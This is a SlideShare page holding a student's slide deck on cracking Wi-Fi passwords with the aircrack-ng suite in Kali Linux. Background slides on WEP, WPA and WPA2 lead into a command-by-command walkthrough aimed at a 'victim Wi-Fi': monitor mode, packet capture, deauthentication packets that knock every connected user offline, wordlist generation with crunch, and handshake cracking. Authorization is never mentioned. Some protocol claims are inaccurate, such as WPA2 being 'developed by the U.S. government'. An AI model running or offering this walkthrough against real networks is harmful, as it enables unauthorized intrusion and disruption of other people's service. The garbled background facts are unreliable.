SlideShare a Scribd company logo
1 of 41
Cyber Security
AhmadYar
BS Computer Science
Bahauddin Zakariya University Multan (BZU)
Sahiwal Campus.
Email ahmadyark1@gmail.com
Mobile +92303 9464551
Content
• Aircrack-ng
• WEP
• WAP
• WAP2
• Practical Implementation
12/18/2018ahmadyark1@gmail.com 3
What is Aircrack-ng?
• Aircrack-ng is the primary application with the aircrack-ng suite, which
is used for password cracking.
• It's capable of using techniques to crackWEP and dictionary cracks for
WPA andWPA2 after capturing the WPA handshake.
12/18/2018ahmadyark1@gmail.com 4
Wired Equivalency Privacy (WEP)
• Developed in the late 1990’s as the first encryption algorithm for the 802.11
standard, WEP was designed with one main goal in mind:
• to prevent hackers from snooping on wireless data as it was transmitted
between clients and access points (APs). From the start, however, WEP
lacked the strength necessary to accomplish this.
12/18/2018ahmadyark1@gmail.com 5
WEP Continue..
• Cyber security experts identified several severe flaws inWEP in 2001,
eventually leading to industry wide recommendations to phase out the use
ofWEP in both enterprise and consumer devices.
• After a large-scale cyber attack executed againstT.J. Maxx in 2009 was
traced back to vulnerabilities exposed by WEP.
12/18/2018ahmadyark1@gmail.com 6
What isWPA ?
• Stands for "Wi-Fi Protected Access.“
• WPA is a security protocol designed to create secure wireless (Wi-Fi)
networks. It is similar to the WEP protocol, but offers improvements in the
way it handles security keys and the way users are authorized.
12/18/2018ahmadyark1@gmail.com 7
Continue..
• For an encrypted data transfer to work, both systems on the beginning and
end of a data transfer must use the same encryption/decryption key. While
WEP provides each authorized system with the same key,WPA uses the
temporal key integrity protocol (TKIP), which dynamically changes the key
that the systems use.This prevents intruders from creating their own
encryption key to match the one used by the secure network.
12/18/2018ahmadyark1@gmail.com 8
Continue…
• WPA also implements something called the Extensible Authentication
Protocol (EAP) for authorizing users.
• Instead of authorizing computers based solely on their MAC address, WPA
can use several other methods to verify each computer's identity. This
makes it more difficult for unauthorized systems to gain access to the
wireless network.
12/18/2018ahmadyark1@gmail.com 9
WPA2
• Developed by the U.S. government to protect classified data.
• As the successor toWPA, the WPA2 standard was ratified by the IEEE in
2004 as 802.11i.
• AlthoughWPA2 still has vulnerabilities, it is considered the most secure
wireless security standard available.
12/18/2018ahmadyark1@gmail.com 10
Continue…
• WPA2TKIP with Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol (CCMP)
• Also meant to be backward-compatible, WPA2 supportsTKIP as a fallback if
a device cannot support CCMP.
12/18/2018ahmadyark1@gmail.com 11
Continue…
• CCMP protects data confidentiality by allowing only authorized network
users to receive data, and it uses cipher block chaining message
authentication code to ensure message integrity.
12/18/2018ahmadyark1@gmail.com 12
Tools Used
1. Wi-Fi Booster
2. VMware Workstation
3. Kali Linux
12/18/2018ahmadyark1@gmail.com 13
Wi-Fi Booster
1. Make broadband wireless in possible coverage
2. Strengthen radio signal to increase the effective range and coverage area
for effective range and coverage area forWi-Fi communication.
3. Install easily, just plug in and play.
4. Save lots of wiring costs
12/18/2018ahmadyark1@gmail.com 14
VMwareWorkstation
1. Secure way to run multiple operating systems at the same time.
2. It is an integral component of any serious technical professional’s toolkit.
3. It offers the broadest host and guest operating system support, the richest
user operating system support, the richest user experience, and the most
comprehensive experience, and the most comprehensive feature set.
12/18/2018ahmadyark1@gmail.com 15
Kali Linux
• Kali Linux is a Debian-derived Linux distribution designed for digital
forensics and penetration testing. It is maintained and funded by Offensive
Security Ltd
12/18/2018ahmadyark1@gmail.com 16
Wireless Attacks tools
• Airbase-ng
• Aircrack-ng
• Airdecap-ng and Airdecloak-ng
• Aireplay-ng
• Airmon-ng
• Airodump-ng
• airodump-ng-oui-update
• Airolib-ng
• Airserv-ng
• Airtun-ng
• Asleap
12/18/2018
ahmadyark1@gmail.com
17
Process
• Install aVMware workstation on your Computer
• Open theVMware workstation and install Kali Linux on it
• After completing installation
• Go toVM>Removable Device
• And now connect yourWi-Fi Booster orWi-Fi Receiver on it.
12/18/2018ahmadyark1@gmail.com 18
Penetration Of AWireless Network StartsWith
Logging Into Kali
• If you haven’t already login to Kali, the default login information
is: root(Username) and toor (Password)
12/18/2018
ahmadyark1@gmail.com
19
WPA Handshake?
• How do hackers or remote attackers obtain the WPA or
WPA2Handshake from a wireless access point easily?
By launching a Wi-Fi bomb they can force all users to disconnect the access
point for a few seconds. Their software will automatically reconnect and this
way they sniff the connection handshake.
12/18/2018ahmadyark1@gmail.com 20
How WIFI works?
• Wi-Fi transmits signal in the form of packets in air so we need to capture all
the packets in air so we use airodump to dump all the packets in air .After
that we should see that if any one is connected to the victim Wi-Fi. If anyone
is not connected the Wi-Fi, cracking is not possible as we need a wpa
handshake. We can capture handshake by sending DE authentication
packets to client connected toWi-Fi. Aircrack cracks the password.
12/18/2018ahmadyark1@gmail.com 21
“iwconfig” command
This command is need to know the name of the wireless adapter
connected to the computer because computer has many adapters
connected.
12/18/2018ahmadyark1@gmail.com 22
12/18/2018ahmadyark1@gmail.com 23
“airmon-ng check kill” command
• This script can be used to enable monitor mode on wireless interfaces. It
may also be used to go back from monitor mode to managed mode.
Entering the airmon-ng command without parameters will show the
interfaces status.
12/18/2018ahmadyark1@gmail.com 24
12/18/2018
ahmadyark1@gmail.com 25
“airmon-ng start wlan0” command
• This command will enable the monitor mode on the Wi-Fi card. So while
using interface in any terminal or command line use “wlan0mon”.
12/18/2018ahmadyark1@gmail.com 26
12/18/2018ahmadyark1@gmail.com 27
”airodump-ng wlanOmon” command
• This will display all the access points in your surroundings and also the
clients connected to that access points
• All the user using this Wi-Fi router.
12/18/2018ahmadyark1@gmail.com 28
12/18/2018ahmadyark1@gmail.com 29
“airodump-ng -c channel –bssid [bssid of Wi-Fi] -w [path to
write the data of packets] wlan0mon[interface]” command
• -bssid in my case bssid is indicated with red mark.
• -c channel is the channel of victim Wi-Fi in my case it is 10(see in previous
screenshot for channel number)
• -w It is used to write the captured data to a specified path in my case it is
‘/root/Desktop/hack’.
• Interface in my case is wlan0mon
12/18/2018ahmadyark1@gmail.com 30
12/18/2018ahmadyark1@gmail.com 31
12/18/2018ahmadyark1@gmail.com 32
“aireplay-ng –deauth 10 -a [router bssid]
interface” command
•In this step we DE authenticate the connected clients
to theWi-Fi
•All the users connected toWi-Fi router disconnects.
12/18/2018ahmadyark1@gmail.com 33
12/18/2018ahmadyark1@gmail.com 34
•After this the client tries to connect to theWi-Fi
again. At that time, we will capture the packets
which sends from client. From this result, we
will get wpa handshake.
12/18/2018ahmadyark1@gmail.com 35
12/18/2018ahmadyark1@gmail.com 36
Create wordlist
12/18/2018ahmadyark1@gmail.com 37
“Crunch 8 8 1234abcd –o wordlist” command
12/18/2018ahmadyark1@gmail.com 38
“aircrack-ng -b [bssid of router] -w [path to word list]
[path to capture packets]” command
12/18/2018ahmadyark1@gmail.com
39
12/18/2018ahmadyark1@gmail.com
40
12/18/2018ahmadyark1@gmail.com 41

More Related Content

What's hot

What's hot (20)

Firewall Security Definition
Firewall Security DefinitionFirewall Security Definition
Firewall Security Definition
 
Network security
Network security Network security
Network security
 
WPA 3
WPA 3WPA 3
WPA 3
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
Wi-fi Hacking
Wi-fi HackingWi-fi Hacking
Wi-fi Hacking
 
Virtual private network(vpn)
Virtual private network(vpn)Virtual private network(vpn)
Virtual private network(vpn)
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability Tester
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
 
VPN (virtual private network)
VPN (virtual private network) VPN (virtual private network)
VPN (virtual private network)
 
Firewall protection
Firewall protectionFirewall protection
Firewall protection
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Mobile security
Mobile securityMobile security
Mobile security
 
Ransomware
RansomwareRansomware
Ransomware
 
Firewall and Types of firewall
Firewall and Types of firewallFirewall and Types of firewall
Firewall and Types of firewall
 
Aruba ClearPass Guest 6.3 User Guide
Aruba ClearPass Guest 6.3 User GuideAruba ClearPass Guest 6.3 User Guide
Aruba ClearPass Guest 6.3 User Guide
 
Mobile security
Mobile securityMobile security
Mobile security
 
WLAN:VPN Security
WLAN:VPN SecurityWLAN:VPN Security
WLAN:VPN Security
 
Network security
Network securityNetwork security
Network security
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 

Similar to How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security

Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's  more than cracking WEPWireless Pentesting: It's  more than cracking WEP
Wireless Pentesting: It's more than cracking WEPJoe McCray
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Setia Juli Irzal Ismail
 
Cisco umbrella youtube
Cisco umbrella youtubeCisco umbrella youtube
Cisco umbrella youtubeDhruv Sharma
 
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptxCIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptxssuserfb92ae
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networksMaghan Das
 
wifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slideswifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slidesguest1c1a9a
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008ClubHack
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityFelipe Prado
 
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...hasimatwork
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Build enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMANBuild enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMANGLC Networks
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security LintersAll Things Open
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security LintersEricBrown328
 
LoginCat from TekMonks
LoginCat from TekMonksLoginCat from TekMonks
LoginCat from TekMonksRohit Kapoor
 
Talk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bTalk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bSylvain Martinez
 

Similar to How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security (20)

Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's  more than cracking WEPWireless Pentesting: It's  more than cracking WEP
Wireless Pentesting: It's more than cracking WEP
 
Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]Chapter 10 wireless hacking [compatibility mode]
Chapter 10 wireless hacking [compatibility mode]
 
Cisco umbrella youtube
Cisco umbrella youtubeCisco umbrella youtube
Cisco umbrella youtube
 
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptxCIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
ClearPass design scenarios that solve the toughest security policy requirements
ClearPass design scenarios that solve the toughest security policy requirementsClearPass design scenarios that solve the toughest security policy requirements
ClearPass design scenarios that solve the toughest security policy requirements
 
wifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slideswifi-y3dips-stmik_mdp_slides
wifi-y3dips-stmik_mdp_slides
 
wifi
wifiwifi
wifi
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
 
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
Section 3 - Technical Sales Foundations for IBM QRadar for Cloud (QRoC)V1 P10...
 
26.1.7 lab snort and firewall rules
26.1.7 lab   snort and firewall rules26.1.7 lab   snort and firewall rules
26.1.7 lab snort and firewall rules
 
Build enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMANBuild enterprise wireless with CAPsMAN
Build enterprise wireless with CAPsMAN
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security Linters
 
Bandit and Gosec - Security Linters
Bandit and Gosec - Security LintersBandit and Gosec - Security Linters
Bandit and Gosec - Security Linters
 
LoginCat from TekMonks
LoginCat from TekMonksLoginCat from TekMonks
LoginCat from TekMonks
 
Wireless Network Security Palo Alto Networks / Aruba Networks Integration
Wireless Network Security Palo Alto Networks / Aruba Networks IntegrationWireless Network Security Palo Alto Networks / Aruba Networks Integration
Wireless Network Security Palo Alto Networks / Aruba Networks Integration
 
Talk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2bTalk2 esc2 muscl-wifi_v1_2b
Talk2 esc2 muscl-wifi_v1_2b
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
 

Recently uploaded

How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17Celine George
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxEsquimalt MFRC
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - Englishneillewis46
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxmarlenawright1
 
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxOn_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxPooja Bhuva
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxRamakrishna Reddy Bijjam
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17Celine George
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfDr Vijay Vishwakarma
 
How to Add a Tool Tip to a Field in Odoo 17
How to Add a Tool Tip to a Field in Odoo 17How to Add a Tool Tip to a Field in Odoo 17
How to Add a Tool Tip to a Field in Odoo 17Celine George
 
Understanding Accommodations and Modifications
Understanding  Accommodations and ModificationsUnderstanding  Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
Introduction to TechSoup’s Digital Marketing Services and Use Cases
Introduction to TechSoup’s Digital Marketing  Services and Use CasesIntroduction to TechSoup’s Digital Marketing  Services and Use Cases
Introduction to TechSoup’s Digital Marketing Services and Use CasesTechSoup
 
Model Attribute _rec_name in the Odoo 17
Model Attribute _rec_name in the Odoo 17Model Attribute _rec_name in the Odoo 17
Model Attribute _rec_name in the Odoo 17Celine George
 
21st_Century_Skills_Framework_Final_Presentation_2.pptx
21st_Century_Skills_Framework_Final_Presentation_2.pptx21st_Century_Skills_Framework_Final_Presentation_2.pptx
21st_Century_Skills_Framework_Final_Presentation_2.pptxJoelynRubio1
 
QUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lesson
QUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lessonQUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lesson
QUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lessonhttgc7rh9c
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Jisc
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsMebane Rash
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Pooja Bhuva
 
AIM of Education-Teachers Training-2024.ppt
AIM of Education-Teachers Training-2024.pptAIM of Education-Teachers Training-2024.ppt
AIM of Education-Teachers Training-2024.pptNishitharanjan Rout
 

Recently uploaded (20)

How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17
 
VAMOS CUIDAR DO NOSSO PLANETA! .
VAMOS CUIDAR DO NOSSO PLANETA!                    .VAMOS CUIDAR DO NOSSO PLANETA!                    .
VAMOS CUIDAR DO NOSSO PLANETA! .
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - English
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
 
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxOn_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docx
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
 
How to Add a Tool Tip to a Field in Odoo 17
How to Add a Tool Tip to a Field in Odoo 17How to Add a Tool Tip to a Field in Odoo 17
How to Add a Tool Tip to a Field in Odoo 17
 
Understanding Accommodations and Modifications
Understanding  Accommodations and ModificationsUnderstanding  Accommodations and Modifications
Understanding Accommodations and Modifications
 
Introduction to TechSoup’s Digital Marketing Services and Use Cases
Introduction to TechSoup’s Digital Marketing  Services and Use CasesIntroduction to TechSoup’s Digital Marketing  Services and Use Cases
Introduction to TechSoup’s Digital Marketing Services and Use Cases
 
Model Attribute _rec_name in the Odoo 17
Model Attribute _rec_name in the Odoo 17Model Attribute _rec_name in the Odoo 17
Model Attribute _rec_name in the Odoo 17
 
21st_Century_Skills_Framework_Final_Presentation_2.pptx
21st_Century_Skills_Framework_Final_Presentation_2.pptx21st_Century_Skills_Framework_Final_Presentation_2.pptx
21st_Century_Skills_Framework_Final_Presentation_2.pptx
 
QUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lesson
QUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lessonQUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lesson
QUATER-1-PE-HEALTH-LC2- this is just a sample of unpacked lesson
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
 
AIM of Education-Teachers Training-2024.ppt
AIM of Education-Teachers Training-2024.pptAIM of Education-Teachers Training-2024.ppt
AIM of Education-Teachers Training-2024.ppt
 

How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security

  • 1.
  • 2. Cyber Security AhmadYar BS Computer Science Bahauddin Zakariya University Multan (BZU) Sahiwal Campus. Email ahmadyark1@gmail.com Mobile +92303 9464551
  • 3. Content • Aircrack-ng • WEP • WAP • WAP2 • Practical Implementation 12/18/2018ahmadyark1@gmail.com 3
  • 4. What is Aircrack-ng? • Aircrack-ng is the primary application with the aircrack-ng suite, which is used for password cracking. • It's capable of using techniques to crackWEP and dictionary cracks for WPA andWPA2 after capturing the WPA handshake. 12/18/2018ahmadyark1@gmail.com 4
  • 5. Wired Equivalency Privacy (WEP) • Developed in the late 1990’s as the first encryption algorithm for the 802.11 standard, WEP was designed with one main goal in mind: • to prevent hackers from snooping on wireless data as it was transmitted between clients and access points (APs). From the start, however, WEP lacked the strength necessary to accomplish this. 12/18/2018ahmadyark1@gmail.com 5
  • 6. WEP Continue.. • Cyber security experts identified several severe flaws inWEP in 2001, eventually leading to industry wide recommendations to phase out the use ofWEP in both enterprise and consumer devices. • After a large-scale cyber attack executed againstT.J. Maxx in 2009 was traced back to vulnerabilities exposed by WEP. 12/18/2018ahmadyark1@gmail.com 6
  • 7. What isWPA ? • Stands for "Wi-Fi Protected Access.“ • WPA is a security protocol designed to create secure wireless (Wi-Fi) networks. It is similar to the WEP protocol, but offers improvements in the way it handles security keys and the way users are authorized. 12/18/2018ahmadyark1@gmail.com 7
  • 8. Continue.. • For an encrypted data transfer to work, both systems on the beginning and end of a data transfer must use the same encryption/decryption key. While WEP provides each authorized system with the same key,WPA uses the temporal key integrity protocol (TKIP), which dynamically changes the key that the systems use.This prevents intruders from creating their own encryption key to match the one used by the secure network. 12/18/2018ahmadyark1@gmail.com 8
  • 9. Continue… • WPA also implements something called the Extensible Authentication Protocol (EAP) for authorizing users. • Instead of authorizing computers based solely on their MAC address, WPA can use several other methods to verify each computer's identity. This makes it more difficult for unauthorized systems to gain access to the wireless network. 12/18/2018ahmadyark1@gmail.com 9
  • 10. WPA2 • Developed by the U.S. government to protect classified data. • As the successor toWPA, the WPA2 standard was ratified by the IEEE in 2004 as 802.11i. • AlthoughWPA2 still has vulnerabilities, it is considered the most secure wireless security standard available. 12/18/2018ahmadyark1@gmail.com 10
  • 11. Continue… • WPA2TKIP with Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) • Also meant to be backward-compatible, WPA2 supportsTKIP as a fallback if a device cannot support CCMP. 12/18/2018ahmadyark1@gmail.com 11
  • 12. Continue… • CCMP protects data confidentiality by allowing only authorized network users to receive data, and it uses cipher block chaining message authentication code to ensure message integrity. 12/18/2018ahmadyark1@gmail.com 12
  • 13. Tools Used 1. Wi-Fi Booster 2. VMware Workstation 3. Kali Linux 12/18/2018ahmadyark1@gmail.com 13
  • 14. Wi-Fi Booster 1. Make broadband wireless in possible coverage 2. Strengthen radio signal to increase the effective range and coverage area for effective range and coverage area forWi-Fi communication. 3. Install easily, just plug in and play. 4. Save lots of wiring costs 12/18/2018ahmadyark1@gmail.com 14
  • 15. VMwareWorkstation 1. Secure way to run multiple operating systems at the same time. 2. It is an integral component of any serious technical professional’s toolkit. 3. It offers the broadest host and guest operating system support, the richest user operating system support, the richest user experience, and the most comprehensive experience, and the most comprehensive feature set. 12/18/2018ahmadyark1@gmail.com 15
  • 16. Kali Linux • Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd 12/18/2018ahmadyark1@gmail.com 16
  • 17. Wireless Attacks tools • Airbase-ng • Aircrack-ng • Airdecap-ng and Airdecloak-ng • Aireplay-ng • Airmon-ng • Airodump-ng • airodump-ng-oui-update • Airolib-ng • Airserv-ng • Airtun-ng • Asleap 12/18/2018 ahmadyark1@gmail.com 17
  • 18. Process • Install aVMware workstation on your Computer • Open theVMware workstation and install Kali Linux on it • After completing installation • Go toVM>Removable Device • And now connect yourWi-Fi Booster orWi-Fi Receiver on it. 12/18/2018ahmadyark1@gmail.com 18
  • 19. Penetration Of AWireless Network StartsWith Logging Into Kali • If you haven’t already login to Kali, the default login information is: root(Username) and toor (Password) 12/18/2018 ahmadyark1@gmail.com 19
  • 20. WPA Handshake? • How do hackers or remote attackers obtain the WPA or WPA2Handshake from a wireless access point easily? By launching a Wi-Fi bomb they can force all users to disconnect the access point for a few seconds. Their software will automatically reconnect and this way they sniff the connection handshake. 12/18/2018ahmadyark1@gmail.com 20
  • 21. How WIFI works? • Wi-Fi transmits signal in the form of packets in air so we need to capture all the packets in air so we use airodump to dump all the packets in air .After that we should see that if any one is connected to the victim Wi-Fi. If anyone is not connected the Wi-Fi, cracking is not possible as we need a wpa handshake. We can capture handshake by sending DE authentication packets to client connected toWi-Fi. Aircrack cracks the password. 12/18/2018ahmadyark1@gmail.com 21
  • 22. “iwconfig” command This command is need to know the name of the wireless adapter connected to the computer because computer has many adapters connected. 12/18/2018ahmadyark1@gmail.com 22
  • 24. “airmon-ng check kill” command • This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. 12/18/2018ahmadyark1@gmail.com 24
  • 26. “airmon-ng start wlan0” command • This command will enable the monitor mode on the Wi-Fi card. So while using interface in any terminal or command line use “wlan0mon”. 12/18/2018ahmadyark1@gmail.com 26
  • 28. ”airodump-ng wlanOmon” command • This will display all the access points in your surroundings and also the clients connected to that access points • All the user using this Wi-Fi router. 12/18/2018ahmadyark1@gmail.com 28
